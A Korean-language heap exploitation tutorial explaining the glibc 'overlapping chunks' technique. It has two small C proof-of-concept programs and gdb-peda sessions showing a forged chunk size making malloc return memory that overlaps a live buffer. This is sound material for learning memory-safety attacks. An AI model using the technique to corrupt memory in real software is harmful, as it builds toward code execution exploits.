Page tree
Skip to end of metadata
Go to start of metadata

Excuse the ads! We need some help to keep our site up.



List

Overlapping chunks

  • 할당자는 메모리를 할당할 때 Unsorted bin에서 chunk가 있는지 확인합니다.
    • Unsorted list에 chunk가 배치되어 있고 해당 chunk가 요청된 크기를 할당하기에 충분하다면, 해당 chunk를 재할당합니다.
    • 만약 요청된 메모리의 크기가 해당 chunk의 크기보다 작다면, 해당 chunk에서 요청된 크기만 큼 메모리를 할당되고 남은 메모리 공간은 arena에 반환됩니다.
    • 그리고 메모리를 분할되고 남은 크기가 매우 작을 경우에는 메모리를 분할하지 않고chunk를 재할당합니다.
  • "Overlapping chunks"는 free chunk의 크기를 변경하여 해당 chunk의 원래 크기보다 더 큰 메모리를 할당받도록 합니다.
    • 이렇게 할당받은 chunk와 기존 chunk의 공간이 서로 겹치게 됩니다.
    • Free chunk의 "size"에 저장되는 값이 다음 free chunk의 "mchunkptr" 이거나, Top chunk여야 합니다.
  • 예를 들어 다음과 같이 3개의 chunk를 할당받고 중간에 있는 chunk를 해제합니다.
    • Free chunk의 "size"에 저장된 값은 0x111인데, 이 값을 0x1a1으로 변경합니다.
    • 할당자는 free chunk의 크기가 0x1a1이라고 판단합니다.
      • 그리고 다음 chunk의 위치는 0x6022B0입니다.
    • 크기가 0x198인 메모리 할당을 요청해서 받은 메모리와 3번째 메모리의 영역이 겹치게 됩니다.
Overlapping chunks flow(Top chunk)

  • 다음은 5개의 메모리를 할당받고 4번째 메모리를 해제합니다.
    • 2번째 chunk의 "size"에 값을 0x101로 덮어쓴 후에 해당 chunk를 해제합니다.
    • 2번째 chunk의 크기는 0x100이되고, 다음 chunk의 시작 위치가 0x602180이 됩니다.
    • 이로 인해 2번째 chunk의 크기가 4번째 chunk의 "prev_size"에 저장되고, 4번째 chunk의 "size"가 가지고 있는 값에서 PREV_INUSE flag(0x1)가 제거됩니다.
    • 그리고 크기가 224(0xE0)byte인 메모리 할당을 malloc에 요청하면 0x602090를 반환하고, 해당 chunk의 크기는 0x100이됩니다.
    • 즉, 새로 할당받은 메모리와 3번째 메모리의 영역이 겹치게 됩니다.
Overlapping chunks flow(Free chunk)

Example

Example1

  • 이 코드는 앞에서 예로 설명한 "Overlapping chunks flow(Top chunk)"의 코드입니다.

    • 해당 코드는 크기가 0x100인 메모리 2개와 0x80인 메모리의 할당을 malloc에 요청합니다.

    • memset()을 이용하여 문자 'B'를 buf2가 가리키는 메모리에 그리고 문자 'C'를 buf3가 가리키는 메모리에 채웁니다.

    • 그리고 할당 받은 2번째 메모리(buf2)를 해제합니다.

    • 새로운 chunk 크기(417)를 *(buf2 - 1)에 덮어씁니다.

    • 그리고 크기가 408byte인 메모리의 할당을 malloc에 요청합니다.

    • 그리고 문자 'A'를 새로 할당 받은 메모리에 채우고, buf3가 가리키는 메모리의 데이터를 화면에 출력합니다.
Overlapping_chunks.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
 
void main(){
 
    unsigned long *buf1 = malloc(0x100);
    unsigned long *buf2 = malloc(0x100);
    unsigned long *buf3 = malloc(0x80);
 
    memset(buf2, 'B', 0x100);
    memset(buf3, 'C', 0x80);
 
    free(buf2);
 
    *(buf2 - 1) = 417;

    char *buf4 = malloc(408);
 
    memset(buf4,'A',408);
    fprintf(stderr,"buf3 : %s\n", (char *)buf3);
}
  • 0x400658, 0x400666, 0x400674에서 할당된 메모리의 주소를 확인합니다.
    • 0x40068e, 0x4006a4에서 각 메모리에 채워진 데이터를 확인합니다.
    • 0x4006b0, 0x4006b8에서 2번재 청크를 해제한 후에 해당 chunk의 size의 값을 확인합니다.
    • 0x4006c에서 새로 할당된 메모리를 확인하고, 0x4006e3에서 채워진 데이터를 확인합니다.
Breakpoints
lazenca0x0@ubuntu:~/Book$ gcc -o overlapping_chunks overlapping_chunks.c 
lazenca0x0@ubuntu:~/Book$ gdb -q ./overlapping_chunks
Reading symbols from ./overlapping_chunks...(no debugging symbols found)...done.
gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x0000000000400646 <+0>:	push   rbp
   0x0000000000400647 <+1>:	mov    rbp,rsp
   0x000000000040064a <+4>:	sub    rsp,0x20
   0x000000000040064e <+8>:	mov    edi,0x100
   0x0000000000400653 <+13>:	call   0x400530 <malloc@plt>
   0x0000000000400658 <+18>:	mov    QWORD PTR [rbp-0x20],rax
   0x000000000040065c <+22>:	mov    edi,0x100
   0x0000000000400661 <+27>:	call   0x400530 <malloc@plt>
   0x0000000000400666 <+32>:	mov    QWORD PTR [rbp-0x18],rax
   0x000000000040066a <+36>:	mov    edi,0x80
   0x000000000040066f <+41>:	call   0x400530 <malloc@plt>
   0x0000000000400674 <+46>:	mov    QWORD PTR [rbp-0x10],rax
   0x0000000000400678 <+50>:	mov    rax,QWORD PTR [rbp-0x18]
   0x000000000040067c <+54>:	mov    edx,0x100
   0x0000000000400681 <+59>:	mov    esi,0x42
   0x0000000000400686 <+64>:	mov    rdi,rax
   0x0000000000400689 <+67>:	call   0x400500 <memset@plt>
   0x000000000040068e <+72>:	mov    rax,QWORD PTR [rbp-0x10]
   0x0000000000400692 <+76>:	mov    edx,0x80
   0x0000000000400697 <+81>:	mov    esi,0x43
   0x000000000040069c <+86>:	mov    rdi,rax
   0x000000000040069f <+89>:	call   0x400500 <memset@plt>
   0x00000000004006a4 <+94>:	mov    rax,QWORD PTR [rbp-0x18]
   0x00000000004006a8 <+98>:	mov    rdi,rax
   0x00000000004006ab <+101>:	call   0x4004f0 <free@plt>
   0x00000000004006b0 <+106>:	mov    rax,QWORD PTR [rbp-0x18]
   0x00000000004006b4 <+110>:	sub    rax,0x8
   0x00000000004006b8 <+114>:	mov    QWORD PTR [rax],0x1a1
   0x00000000004006bf <+121>:	mov    edi,0x198
   0x00000000004006c4 <+126>:	call   0x400530 <malloc@plt>
   0x00000000004006c9 <+131>:	mov    QWORD PTR [rbp-0x8],rax
   0x00000000004006cd <+135>:	mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004006d1 <+139>:	mov    edx,0x198
   0x00000000004006d6 <+144>:	mov    esi,0x41
   0x00000000004006db <+149>:	mov    rdi,rax
   0x00000000004006de <+152>:	call   0x400500 <memset@plt>
   0x00000000004006e3 <+157>:	mov    rax,QWORD PTR [rip+0x200976]        # 0x601060 <stderr@@GLIBC_2.2.5>
   0x00000000004006ea <+164>:	mov    rdx,QWORD PTR [rbp-0x10]
   0x00000000004006ee <+168>:	mov    esi,0x400794
   0x00000000004006f3 <+173>:	mov    rdi,rax
   0x00000000004006f6 <+176>:	mov    eax,0x0
   0x00000000004006fb <+181>:	call   0x400520 <fprintf@plt>
   0x0000000000400700 <+186>:	nop
   0x0000000000400701 <+187>:	leave  
   0x0000000000400702 <+188>:	ret    
End of assembler dump.
gdb-peda$ b *0x0000000000400658
Breakpoint 1 at 0x400658
gdb-peda$ b *0x0000000000400666
Breakpoint 2 at 0x400666
gdb-peda$ b *0x0000000000400674
Breakpoint 3 at 0x400674
gdb-peda$ b *0x000000000040068e
Breakpoint 4 at 0x40068e
gdb-peda$ b *0x00000000004006a4
Breakpoint 5 at 0x4006a4
gdb-peda$ b *0x00000000004006b0
Breakpoint 6 at 0x4006b0
gdb-peda$ b *0x00000000004006b8
Breakpoint 7 at 0x4006b8
gdb-peda$ b *0x00000000004006c9
Breakpoint 8 at 0x4006c9
gdb-peda$ b *0x00000000004006e3
Breakpoint 9 at 0x4006e3
gdb-peda$
  • malloc으로 부터 할당 메모리의 주소는 0x602010(buf1), 0x602120(buf2), 0x602230(buf3) 입니다.
Pointers of Allocated Memory
gdb-peda$ r
Starting program: /home/lazenca0x0/Book/overlapping_chunks 

Breakpoint 1, 0x0000000000400658 in main ()
gdb-peda$ i r rax
rax            0x602010	0x602010
gdb-peda$ c
Continuing.

Breakpoint 2, 0x0000000000400666 in main ()
gdb-peda$ i r rax
rax            0x602120	0x602120
gdb-peda$ c
Continuing.

Breakpoint 3, 0x0000000000400674 in main ()
gdb-peda$ i r rax
rax            0x602230	0x602230
gdb-peda$ 
  • memset을 이용하여 buf2에는 문자 'B'가, buf3에는 문자 'C'가 채워졌습니다.
Filled the memory with characters.
gdb-peda$ c
Continuing.

Breakpoint 4, 0x000000000040068e in main ()
gdb-peda$ x/40gx 0x602120
0x602120:	0x4242424242424242	0x4242424242424242
0x602130:	0x4242424242424242	0x4242424242424242
0x602140:	0x4242424242424242	0x4242424242424242
0x602150:	0x4242424242424242	0x4242424242424242
0x602160:	0x4242424242424242	0x4242424242424242
0x602170:	0x4242424242424242	0x4242424242424242
0x602180:	0x4242424242424242	0x4242424242424242
0x602190:	0x4242424242424242	0x4242424242424242
0x6021a0:	0x4242424242424242	0x4242424242424242
0x6021b0:	0x4242424242424242	0x4242424242424242
0x6021c0:	0x4242424242424242	0x4242424242424242
0x6021d0:	0x4242424242424242	0x4242424242424242
0x6021e0:	0x4242424242424242	0x4242424242424242
0x6021f0:	0x4242424242424242	0x4242424242424242
0x602200:	0x4242424242424242	0x4242424242424242
0x602210:	0x4242424242424242	0x4242424242424242
0x602220:	0x0000000000000000	0x0000000000000091
0x602230:	0x0000000000000000	0x0000000000000000
0x602240:	0x0000000000000000	0x0000000000000000
0x602250:	0x0000000000000000	0x0000000000000000
gdb-peda$ c
Continuing.

Breakpoint 5, 0x00000000004006a4 in main ()
gdb-peda$ x/20gx 0x602230
0x602230:	0x4343434343434343	0x4343434343434343
0x602240:	0x4343434343434343	0x4343434343434343
0x602250:	0x4343434343434343	0x4343434343434343
0x602260:	0x4343434343434343	0x4343434343434343
0x602270:	0x4343434343434343	0x4343434343434343
0x602280:	0x4343434343434343	0x4343434343434343
0x602290:	0x4343434343434343	0x4343434343434343
0x6022a0:	0x4343434343434343	0x4343434343434343
0x6022b0:	0x0000000000000000	0x0000000000020d51
0x6022c0:	0x0000000000000000	0x0000000000000000
gdb-peda$ 
  • 2번째 메모리가 해제되고, 해당 chunk의 size 값을 0x1a1으로 변경합니다.
Overwrite the size of the free chunk.
gdb-peda$ c
Continuing.

Breakpoint 6, 0x00000000004006b0 in main ()
gdb-peda$ p main_arena.bins[0]
$1 = (mchunkptr) 0x602110
gdb-peda$ p main_arena.bins[1]
$2 = (mchunkptr) 0x602110
gdb-peda$ c
Continuing.

Breakpoint 7, 0x00000000004006b8 in main ()
gdb-peda$ x/i $rip
=> 0x4006b8 <main+114>:	mov    QWORD PTR [rax],0x1a1
gdb-peda$ i r rax
rax            0x602118	0x602118
gdb-peda$ x/gx 0x602118
0x602118:	0x0000000000000111
gdb-peda$ ni

0x00000000004006bf in main ()
gdb-peda$ x/gx 0x602118
0x602118:	0x00000000000001a1
gdb-peda$ p main_arena.bins[0].size 
$3 = 0x1a1
gdb-peda$ 
  • 크기가 408byte인 메모리의 할당을 malloc()에 요청하면, 할당자는 앞에서 크기가 변경된 2번째 메모리를 재할당합니다.

    • 재할단된 메모리의 크기는 0x1a0(0x1a1 - 0x1)이며,  해당 메모리의 범위는 0x602120 ~ 0x6022b0 입니다.

    • 해당 메모리의 영역과 buf3이 가리키는 메모리의 영역이 겹치게 됩니다.
Reallocation of Memory
gdb-peda$ c
Continuing.

Breakpoint 8, 0x00000000004006c9 in main ()
gdb-peda$ i r rax
rax            0x602120	0x602120
gdb-peda$ x/2gx 0x602120 - 0x10
0x602110:	0x0000000000000000	0x00000000000001a1
gdb-peda$ p/x 0x602110 + 0x1a0
$4 = 0x6022b0
gdb-peda$ 
  • memset()이 재할당받은 메모리 영역에 문자 'A'를 채우게 되면 buf3의 영역에도 문자가 저장됩니다.
The data overwrote the third memory.
gdb-peda$ c
Continuing.

Breakpoint 9, 0x00000000004006e3 in main ()
gdb-peda$ x/60gx 0x602120
0x602120:	0x4141414141414141	0x4141414141414141
0x602130:	0x4141414141414141	0x4141414141414141
0x602140:	0x4141414141414141	0x4141414141414141
0x602150:	0x4141414141414141	0x4141414141414141
0x602160:	0x4141414141414141	0x4141414141414141
0x602170:	0x4141414141414141	0x4141414141414141
0x602180:	0x4141414141414141	0x4141414141414141
0x602190:	0x4141414141414141	0x4141414141414141
0x6021a0:	0x4141414141414141	0x4141414141414141
0x6021b0:	0x4141414141414141	0x4141414141414141
0x6021c0:	0x4141414141414141	0x4141414141414141
0x6021d0:	0x4141414141414141	0x4141414141414141
0x6021e0:	0x4141414141414141	0x4141414141414141
0x6021f0:	0x4141414141414141	0x4141414141414141
0x602200:	0x4141414141414141	0x4141414141414141
0x602210:	0x4141414141414141	0x4141414141414141
0x602220:	0x4141414141414141	0x4141414141414141
0x602230:	0x4141414141414141	0x4141414141414141
0x602240:	0x4141414141414141	0x4141414141414141
0x602250:	0x4141414141414141	0x4141414141414141
0x602260:	0x4141414141414141	0x4141414141414141
0x602270:	0x4141414141414141	0x4141414141414141
0x602280:	0x4141414141414141	0x4141414141414141
0x602290:	0x4141414141414141	0x4141414141414141
0x6022a0:	0x4141414141414141	0x4141414141414141
0x6022b0:	0x0000000000000000	0x0000000000020d51
0x6022c0:	0x0000000000000000	0x0000000000000000
0x6022d0:	0x0000000000000000	0x0000000000000000
0x6022e0:	0x0000000000000000	0x0000000000000000
0x6022f0:	0x0000000000000000	0x0000000000000000
gdb-peda$ c
Continuing.
buf3 : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[Inferior 1 (process 2790) exited with code 0210]
Warning: not running
gdb-peda$

Example2

  • 다음 코드는 "Overlapping chunks flow(Free chunk)"에 대한 예제입니다.
    • malloc에 5개의 메모리 할당을 요청합니다.
    • 4번째 메모리를 해제한 후에 해당 chunk의 size값을 0x101로 덮어씁니다.
    • 2번재 메모리를 해제한 후에 malloc에 새로운 메모리 할당을 요청합니다.
    • 그리고 해당 메모리에 문자 'C'를 채운 후에 세번째 메모리의 데이터를 출력합니다.
overlapping_chunks2.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <unistd.h>
 
int main(){
    unsigned long *buf1 = malloc(112);
    unsigned long *buf2 = malloc(112);
    unsigned long *buf3 = malloc(112);
    unsigned long *buf4 = malloc(112);
    unsigned long *buf5 = malloc(112);
 
    free(buf4);
 
    *(buf2 -1) = 0x101;
 
    free(buf2);
    char *buf6 = malloc(224);
 
    memset(buf6,'C',224);
    fprintf(stderr,"buf3 : %s\n", (char *)buf3);
}
  • 0x400658, 0x400666, 0x400674, 0x400682, 0x400690에서는 할당된 메모리의 주소를 확인합니다.
    • 0x4006a0에서 4번째 메모리의 해제를 확인하고, 0x4006a8에서 2번재 메모리의 크기 값 변경을 확인합니다.
    • 0x4006bb에서 2번재 메모리의 해제를 확인하고, 0x4006c5에서새로 할당된 메모리의 주소와 크기를 확인합니다.
    • 0x4006df에서는 새로 할당된 메모리의 데이터를 확인하고 buf3의 데이터 출력을 확인합니다.
Breakpoints
lazenca0x0@ubuntu:~/Book$ gcc -o overlapping_chunks2 overlapping_chunks2.c 
lazenca0x0@ubuntu:~/Book$ gdb -q ./overlapping_chunks2
Reading symbols from ./overlapping_chunks2...(no debugging symbols found)...done.
gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x0000000000400646 <+0>:	push   rbp
   0x0000000000400647 <+1>:	mov    rbp,rsp
   0x000000000040064a <+4>:	sub    rsp,0x30
   0x000000000040064e <+8>:	mov    edi,0x70
   0x0000000000400653 <+13>:	call   0x400530 <malloc@plt>
   0x0000000000400658 <+18>:	mov    QWORD PTR [rbp-0x30],rax
   0x000000000040065c <+22>:	mov    edi,0x70
   0x0000000000400661 <+27>:	call   0x400530 <malloc@plt>
   0x0000000000400666 <+32>:	mov    QWORD PTR [rbp-0x28],rax
   0x000000000040066a <+36>:	mov    edi,0x70
   0x000000000040066f <+41>:	call   0x400530 <malloc@plt>
   0x0000000000400674 <+46>:	mov    QWORD PTR [rbp-0x20],rax
   0x0000000000400678 <+50>:	mov    edi,0x70
   0x000000000040067d <+55>:	call   0x400530 <malloc@plt>
   0x0000000000400682 <+60>:	mov    QWORD PTR [rbp-0x18],rax
   0x0000000000400686 <+64>:	mov    edi,0x70
   0x000000000040068b <+69>:	call   0x400530 <malloc@plt>
   0x0000000000400690 <+74>:	mov    QWORD PTR [rbp-0x10],rax
   0x0000000000400694 <+78>:	mov    rax,QWORD PTR [rbp-0x18]
   0x0000000000400698 <+82>:	mov    rdi,rax
   0x000000000040069b <+85>:	call   0x4004f0 <free@plt>
   0x00000000004006a0 <+90>:	mov    rax,QWORD PTR [rbp-0x28]
   0x00000000004006a4 <+94>:	sub    rax,0x8
   0x00000000004006a8 <+98>:	mov    QWORD PTR [rax],0x101
   0x00000000004006af <+105>:	mov    rax,QWORD PTR [rbp-0x28]
   0x00000000004006b3 <+109>:	mov    rdi,rax
   0x00000000004006b6 <+112>:	call   0x4004f0 <free@plt>
   0x00000000004006bb <+117>:	mov    edi,0xe0
   0x00000000004006c0 <+122>:	call   0x400530 <malloc@plt>
   0x00000000004006c5 <+127>:	mov    QWORD PTR [rbp-0x8],rax
   0x00000000004006c9 <+131>:	mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004006cd <+135>:	mov    edx,0xe0
   0x00000000004006d2 <+140>:	mov    esi,0x43
   0x00000000004006d7 <+145>:	mov    rdi,rax
   0x00000000004006da <+148>:	call   0x400500 <memset@plt>
   0x00000000004006df <+153>:	mov    rax,QWORD PTR [rip+0x20097a]        # 0x601060 <stderr@@GLIBC_2.2.5>
   0x00000000004006e6 <+160>:	mov    rdx,QWORD PTR [rbp-0x20]
   0x00000000004006ea <+164>:	mov    esi,0x400794
   0x00000000004006ef <+169>:	mov    rdi,rax
   0x00000000004006f2 <+172>:	mov    eax,0x0
   0x00000000004006f7 <+177>:	call   0x400520 <fprintf@plt>
   0x00000000004006fc <+182>:	mov    eax,0x0
   0x0000000000400701 <+187>:	leave  
   0x0000000000400702 <+188>:	ret    
End of assembler dump.
gdb-peda$ b *0x0000000000400658
Breakpoint 1 at 0x400658
gdb-peda$ b *0x0000000000400666
Breakpoint 2 at 0x400666
gdb-peda$ b *0x0000000000400674
Breakpoint 3 at 0x400674
gdb-peda$ b *0x0000000000400682
Breakpoint 4 at 0x400682
gdb-peda$ b *0x0000000000400690
Breakpoint 5 at 0x400690
gdb-peda$ b *0x00000000004006a0
Breakpoint 6 at 0x4006a0
gdb-peda$ b *0x00000000004006a8
Breakpoint 7 at 0x4006a8
gdb-peda$ b *0x00000000004006bb
Breakpoint 8 at 0x4006bb
gdb-peda$ b *0x00000000004006c5
Breakpoint 9 at 0x4006c5
gdb-peda$ b *0x00000000004006df
Breakpoint 10 at 0x4006df
gdb-peda$
  • malloc으로 부터 할당받은 pointer는 0x602010, 0x602090, 0x602110, 0x602190, 0x602210 입니다.
Allocated Memory
gdb-peda$ r
Starting program: /home/lazenca0x0/Book/overlapping_chunks2 

Breakpoint 1, 0x0000000000400658 in main ()
gdb-peda$ i r rax
rax            0x602010	0x602010
gdb-peda$ c
Continuing.

Breakpoint 2, 0x0000000000400666 in main ()
gdb-peda$ i r rax
rax            0x602090	0x602090
gdb-peda$ c
Continuing.

Breakpoint 3, 0x0000000000400674 in main ()
gdb-peda$ i r rax
rax            0x602110	0x602110
gdb-peda$ c
Continuing.

Breakpoint 4, 0x0000000000400682 in main ()
gdb-peda$ i r rax
rax            0x602190	0x602190
gdb-peda$ c
Continuing.

Breakpoint 5, 0x0000000000400690 in main ()
gdb-peda$ i r rax
rax            0x602210	0x602210
gdb-peda$
  • 4번째 메모리가 해제된 후에 해당 chunk는 fastbinsY[6] 배치되었습니다.

    • 2번째 메모리의 크기 값을 0x101으로 변경합니다.

Changed the size value of the second memory.
gdb-peda$ c
Continuing.

Breakpoint 6, 0x00000000004006a0 in main ()
gdb-peda$ p main_arena.fastbinsY[6]
$3 = (mfastbinptr) 0x602180
gdb-peda$ c
Continuing.

Breakpoint 7, 0x00000000004006a8 in main ()
gdb-peda$ x/i $rip
=> 0x4006a8 <main+98>:	mov    QWORD PTR [rax],0x101
gdb-peda$ i r rax
rax            0x602088	0x602088
gdb-peda$ x/gx 0x602088
0x602088:	0x0000000000000081
gdb-peda$ ni

0x00000000004006af in main ()
gdb-peda$ x/gx 0x602088
0x602088:	0x0000000000000101
gdb-peda$ 
  • 2번째 메모리를 해제하면 해당 chunk는 Unsorted bin에 등록되며, 해당 chunk의 크기는 0x100입니다.
    • malloc에 크기가 224byte인 메모리 할당을 요청하면, 해당 chunk를 재할당합니다.
Free the second memory and reallocate the memory
gdb-peda$ c
Continuing.

Breakpoint 8, 0x00000000004006bb in main ()
gdb-peda$ p main_arena.bins[0]
$4 = (mchunkptr) 0x602080
gdb-peda$ p main_arena.bins[1]
$5 = (mchunkptr) 0x602080
gdb-peda$ p main_arena.bins[0].size
$6 = 0x101
gdb-peda$ c
Continuing.

Breakpoint 9, 0x00000000004006c5 in main ()
gdb-peda$ i r rax
rax            0x602090	0x602090
gdb-peda$ x/2gx 0x602090 - 0x10
0x602080:	0x0000000000000000	0x0000000000000101
gdb-peda$ p/x 0x602090 + 0x100
$7 = 0x602190
gdb-peda$
  • 문자 'C'를 새로 할당 받은 영역에 채우면, 3번째 메모리의 영역에도 문자가 덮어써집니다.
    • 즉, 새로 할당 받은 메모리와 3번째 메모리의 영역이 겹친다는 것을 알 수 있습니다.
The data overwrote the third memory.
gdb-peda$ c
Continuing.

Breakpoint 10, 0x00000000004006df in main ()
gdb-peda$ x/40gx 0x602090
0x602090:	0x4343434343434343	0x4343434343434343
0x6020a0:	0x4343434343434343	0x4343434343434343
0x6020b0:	0x4343434343434343	0x4343434343434343
0x6020c0:	0x4343434343434343	0x4343434343434343
0x6020d0:	0x4343434343434343	0x4343434343434343
0x6020e0:	0x4343434343434343	0x4343434343434343
0x6020f0:	0x4343434343434343	0x4343434343434343
0x602100:	0x4343434343434343	0x4343434343434343
0x602110:	0x4343434343434343	0x4343434343434343
0x602120:	0x4343434343434343	0x4343434343434343
0x602130:	0x4343434343434343	0x4343434343434343
0x602140:	0x4343434343434343	0x4343434343434343
0x602150:	0x4343434343434343	0x4343434343434343
0x602160:	0x4343434343434343	0x4343434343434343
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000100	0x0000000000000081
0x602190:	0x0000000000000000	0x0000000000000000
0x6021a0:	0x0000000000000000	0x0000000000000000
0x6021b0:	0x0000000000000000	0x0000000000000000
0x6021c0:	0x0000000000000000	0x0000000000000000
gdb-peda$ c
Continuing.
buf3 : CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
[Inferior 1 (process 3085) exited normally]
Warning: not running
gdb-peda$ 

Related information